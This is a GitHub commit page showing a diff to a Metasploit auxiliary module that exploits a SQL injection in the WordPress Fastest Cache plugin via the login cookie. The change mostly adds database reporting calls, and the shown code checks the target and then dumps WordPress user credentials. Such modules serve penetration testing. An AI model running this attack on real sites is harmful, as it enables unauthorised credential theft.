Skip to content

Commit

Permalink
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add report_host, report_service and report_vuln
Browse files Browse the repository at this point in the history
Chocapikk committed Oct 3, 2024
1 parent 69074bb commit d295ed0
Showing 1 changed file with 28 additions and 5 deletions.
33 changes: 28 additions & 5 deletions modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
Original file line number Diff line number Diff line change
@@ -47,7 +47,7 @@ def initialize(info = {})
]
end

def run_host(_ip)
def run_host(ip)
print_status("Performing SQL injection via the 'wordpress_logged_in' cookie...")

random_number = Rex::Text.rand_text_numeric(4..8)
@@ -63,10 +63,33 @@ def run_host(_ip)
fail_with Failure::Unreachable, 'Connection failed' unless res
end

fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.') unless @sqli.test_vulnerable
print_good('Target is vulnerable to SQLi!')
if @sqli.test_vulnerable
print_good('Target is vulnerable to SQLi!')

wordpress_sqli_initialize(@sqli)
wordpress_sqli_get_users_credentials(datastore['COUNT'])
wordpress_sqli_initialize(@sqli)
wordpress_sqli_get_users_credentials(datastore['COUNT'])

report_host(host: ip)

report_service(
host: ip,
port: rport,
proto: 'tcp',
name: fullname,
info: description.strip
)

report_vuln(
host: ip,
port: rport,
proto: 'tcp',
name: fullname,
refs: references,
info: description.strip
)

else
fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.')
end
end
end

0 comments on commit d295ed0

Please sign in to comment.